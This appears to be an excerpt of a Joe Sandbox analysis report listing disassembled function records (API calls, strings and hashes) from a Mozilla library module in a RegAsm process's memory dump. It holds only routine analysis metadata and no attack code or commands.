                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                        • API String ID: 3634367004-706389432
                                                                                                                                                        • Opcode ID: a22eb6f8f77defaebf7b15f5d8b15ff885018bf16ebf78ec9fc91abe87d9c27d
                                                                                                                                                        • Instruction ID: 41a022ab29f1c4976638b111ceda6835c916419b183b69c0d85fb749746c02c6
                                                                                                                                                        • Opcode Fuzzy Hash: a22eb6f8f77defaebf7b15f5d8b15ff885018bf16ebf78ec9fc91abe87d9c27d
                                                                                                                                                        • Instruction Fuzzy Hash: 1D31D370B02206ABDF04DFBAC988EAA73B9FB87305F100129E505E3660DB749945CF79
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$moz_xmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3009372454-0
                                                                                                                                                        • Opcode ID: 71df5c81778bd44e53e03af29892714acf617b869891f3a7c57cbfbacc0225de
                                                                                                                                                        • Instruction ID: 500bd249e689d60bddc76badd6a5b12315a3ea15963eb348945eb1552c508378
                                                                                                                                                        • Opcode Fuzzy Hash: 71df5c81778bd44e53e03af29892714acf617b869891f3a7c57cbfbacc0225de
                                                                                                                                                        • Instruction Fuzzy Hash: DCB1E671B001108FDB2C9E3CCAD07BD77A1AF52318F184669E416EBB96E7B1D8408B49
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1192971331-0
                                                                                                                                                        • Opcode ID: 0efe3aac6c45e8b541dc580a827eca7bd0356d83c7bbc277aa88d3598d158abf
                                                                                                                                                        • Instruction ID: 8a19a606a0e6db0ac5353be68406fa557229aa0114670ee407832b4203238d88
                                                                                                                                                        • Opcode Fuzzy Hash: 0efe3aac6c45e8b541dc580a827eca7bd0356d83c7bbc277aa88d3598d158abf
                                                                                                                                                        • Instruction Fuzzy Hash: 483184B19057059FDB00AF7AC98825EBBF0FF86345F01492DE98587611EB709449CBA6
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C619675
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C619697
                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6196E8
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C619707
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C61971F
                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C619773
                                                                                                                                                          • Part of subcall function 6C63AB89: EnterCriticalSection.KERNEL32(6C68E370,?,?,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284), ref: 6C63AB94
                                                                                                                                                          • Part of subcall function 6C63AB89: LeaveCriticalSection.KERNEL32(6C68E370,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63ABD1
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6197B7
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C6197D0
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C6197EB
                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C619824
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                                                        • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                        • API String ID: 409848716-3880535382
                                                                                                                                                        • Opcode ID: a0090f3f9d775b9de26193bd776a7067bc75aef565015ee972d68e274360a184
                                                                                                                                                        • Instruction ID: f7f4924b8dc620d9f93d11065c1049a34c0ccf599ab07129e3bca114b22a3de1
                                                                                                                                                        • Opcode Fuzzy Hash: a0090f3f9d775b9de26193bd776a7067bc75aef565015ee972d68e274360a184
                                                                                                                                                        • Instruction Fuzzy Hash: 93418274602205AFEF00CFAAE8D4A9677B4FB4B359F104528ED1597B40D730A855CFBA
                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C613EEE
                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C613FDC
                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C614006
                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C6140A1
                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C613CCC), ref: 6C6140AF
                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C613CCC), ref: 6C6140C2
                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C614134
                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C613CCC), ref: 6C614143
                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C613CCC), ref: 6C614157
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3680524765-0
                                                                                                                                                        • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                        • Instruction ID: ee1e0459381259b07479f40faeab224bf173c7f087f022be3fc84514aba03fda
                                                                                                                                                        • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                        • Instruction Fuzzy Hash: C2A1AFB1A04205CFDB50CF29C880769B7B5FF48319F2545A9D909AFB42D771E886CBA4
                                                                                                                                                        APIs
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C658273), ref: 6C659D65
                                                                                                                                                        • free.MOZGLUE(6C658273,?), ref: 6C659D7C
                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6C659D92
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C659E0F
                                                                                                                                                        • free.MOZGLUE(6C65946B,?,?), ref: 6C659E24
                                                                                                                                                        • free.MOZGLUE(?,?,?), ref: 6C659E3A
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C659EC8
                                                                                                                                                        • free.MOZGLUE(6C65946B,?,?,?), ref: 6C659EDF
                                                                                                                                                        • free.MOZGLUE(?,?,?,?), ref: 6C659EF5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 956590011-0
                                                                                                                                                        • Opcode ID: 8c1444cbc66847dd3a46514f06a750805755e9b6ccb447a086fb4ea98eae1511
                                                                                                                                                        • Instruction ID: b565e569548134dc913be96524c5110455d3415ef1df0dcab2eb921f50b83bdf
                                                                                                                                                        • Opcode Fuzzy Hash: 8c1444cbc66847dd3a46514f06a750805755e9b6ccb447a086fb4ea98eae1511
                                                                                                                                                        • Instruction Fuzzy Hash: B87191B0909B419BD712CF18C4405ABF3F4FF99319B94961DE89A5B711EB30E886CF89
                                                                                                                                                        APIs
                                                                                                                                                        • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C65DDCF
                                                                                                                                                          • Part of subcall function 6C63FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C63FA4B
                                                                                                                                                          • Part of subcall function 6C6590E0: free.MOZGLUE(?,00000000,?,?,6C65DEDB), ref: 6C6590FF
                                                                                                                                                          • Part of subcall function 6C6590E0: free.MOZGLUE(?,00000000,?,?,6C65DEDB), ref: 6C659108
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C65DE0D
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C65DE41
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C65DE5F
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C65DEA3
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C65DEE9
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C64DEFD,?,6C614A68), ref: 6C65DF32
                                                                                                                                                          • Part of subcall function 6C65DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C65DB86
                                                                                                                                                          • Part of subcall function 6C65DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C65DC0E
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C64DEFD,?,6C614A68), ref: 6C65DF65
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C65DF80
                                                                                                                                                          • Part of subcall function 6C625E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C625EDB
                                                                                                                                                          • Part of subcall function 6C625E90: memset.VCRUNTIME140(ewfl,000000E5,?), ref: 6C625F27
                                                                                                                                                          • Part of subcall function 6C625E90: LeaveCriticalSection.KERNEL32(?), ref: 6C625FB2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 112305417-0
                                                                                                                                                        • Opcode ID: 608fd2860faf0e6dfd33454cc6347d49b6f9034cd755047914b2a534d7740c64
                                                                                                                                                        • Instruction ID: 5eae35c67ec0c06f8a14a302732982cbd8f48297f0c043c9fe9daa2ef1a66d81
                                                                                                                                                        • Opcode Fuzzy Hash: 608fd2860faf0e6dfd33454cc6347d49b6f9034cd755047914b2a534d7740c64
                                                                                                                                                        • Instruction Fuzzy Hash: 2B51C872701601ABD7219B18D9806EE7372BF9234CFE5051CD45A63B80D732F82ACB9E
                                                                                                                                                        APIs
                                                                                                                                                        • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665D32
                                                                                                                                                        • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665D62
                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665D6D
                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665D84
                                                                                                                                                        • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665DA4
                                                                                                                                                        • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665DC9
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6C665DDB
                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665E00
                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665E45
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2325513730-0
                                                                                                                                                        • Opcode ID: b74aaa8c734b55c7d5404f3103cbd5e9abf11233c547944e319308cb448ca608
                                                                                                                                                        • Instruction ID: 1562082fe59e981f4790ae032731883f9af57b1c6ffe61f87cce3e70b28a6b65
                                                                                                                                                        • Opcode Fuzzy Hash: b74aaa8c734b55c7d5404f3103cbd5e9abf11233c547944e319308cb448ca608
                                                                                                                                                        • Instruction Fuzzy Hash: B4416F74701205AFCB10DF66C8D9AAE77F5EF8A314F544068D50A9BB92DB30AC05CB6A
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6031A7), ref: 6C63CDDD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                        • API String ID: 4275171209-2186867486
                                                                                                                                                        • Opcode ID: 895eb02413662be35f49b9501fce3057330c079c710e2448a9e4794ec175abaf
                                                                                                                                                        • Instruction ID: 95dd92e7274460426197c3e10973f70fd6c98598eab527528e084f1f7568bde3
                                                                                                                                                        • Opcode Fuzzy Hash: 895eb02413662be35f49b9501fce3057330c079c710e2448a9e4794ec175abaf
                                                                                                                                                        • Instruction Fuzzy Hash: 3731E7307412357BEF00AEA68C45BAE3775AF81708F206118F61AAB6C0DB70D401CBAD
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C60F100: LoadLibraryW.KERNEL32(shell32,?,6C67D020), ref: 6C60F122
                                                                                                                                                          • Part of subcall function 6C60F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C60F132
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000012), ref: 6C60ED50
                                                                                                                                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C60EDAC
                                                                                                                                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C60EDCC
                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C60EE08
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C60EE27
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C60EE32
                                                                                                                                                          • Part of subcall function 6C60EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C60EBB5
                                                                                                                                                          • Part of subcall function 6C60EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C63D7F3), ref: 6C60EBC3
                                                                                                                                                          • Part of subcall function 6C60EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C63D7F3), ref: 6C60EBD6
                                                                                                                                                        Strings
                                                                                                                                                        • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C60EDC1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                        • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                        • API String ID: 1980384892-344433685
                                                                                                                                                        • Opcode ID: 2dcf98c13e469516bf31d69b6493439dd91443d009e24c5f2702b26fe6f81a18
                                                                                                                                                        • Instruction ID: bfb5cd0941028071212fd61ce6d0c75a452f36673f2e28f4837e7d53be14b7ce
                                                                                                                                                        • Opcode Fuzzy Hash: 2dcf98c13e469516bf31d69b6493439dd91443d009e24c5f2702b26fe6f81a18
                                                                                                                                                        • Instruction Fuzzy Hash: 0651F571E052289BDB14DF68CA407EEB7F0EF5A318F04882DD89577780E7306949C7AA
                                                                                                                                                        APIs
                                                                                                                                                        • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C67A565
                                                                                                                                                          • Part of subcall function 6C67A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C67A4BE
                                                                                                                                                          • Part of subcall function 6C67A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C67A4D6
                                                                                                                                                        • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C67A65B
                                                                                                                                                        • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C67A6B6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                                                        • String ID: 0$z
                                                                                                                                                        • API String ID: 310210123-2584888582
                                                                                                                                                        • Opcode ID: aa022d81d9a142cce82832540612c4a2d638214d9c8ddcfc41afbb70907380f7
                                                                                                                                                        • Instruction ID: 7cd33347e41d5b401ff1ebf8b09b0ef2e2c249273b1b418889aed0f8aadb0587
                                                                                                                                                        • Opcode Fuzzy Hash: aa022d81d9a142cce82832540612c4a2d638214d9c8ddcfc41afbb70907380f7
                                                                                                                                                        • Instruction Fuzzy Hash: 31415971A097459FC351CF28C080A8BBBE4BFCA344F409A2EF4998B651EB30D549CB97
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C63AB89: EnterCriticalSection.KERNEL32(6C68E370,?,?,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284), ref: 6C63AB94
                                                                                                                                                          • Part of subcall function 6C63AB89: LeaveCriticalSection.KERNEL32(6C68E370,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63ABD1
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        Strings
                                                                                                                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C649459
                                                                                                                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C64947D
                                                                                                                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C64946B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                        • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                        • API String ID: 4042361484-1628757462
                                                                                                                                                        • Opcode ID: b2b55356f1252e688ba93f63ee678541217602c89bb1e8f345443dad24158b6f
                                                                                                                                                        • Instruction ID: 9244b932b20999f6846134a1706514a7a6f73b0f001d229b69f4005450a80183
                                                                                                                                                        • Opcode Fuzzy Hash: b2b55356f1252e688ba93f63ee678541217602c89bb1e8f345443dad24158b6f
                                                                                                                                                        • Instruction Fuzzy Hash: 7B01D870A02101A7DB009B6EDA51A8933799F4B36CF148537D90BC6B42D632D865897F
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(?,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B6AC
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B6D1
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B6E3
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B70B
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C60B61E,?,?,?,?,?,00000000), ref: 6C60B71D
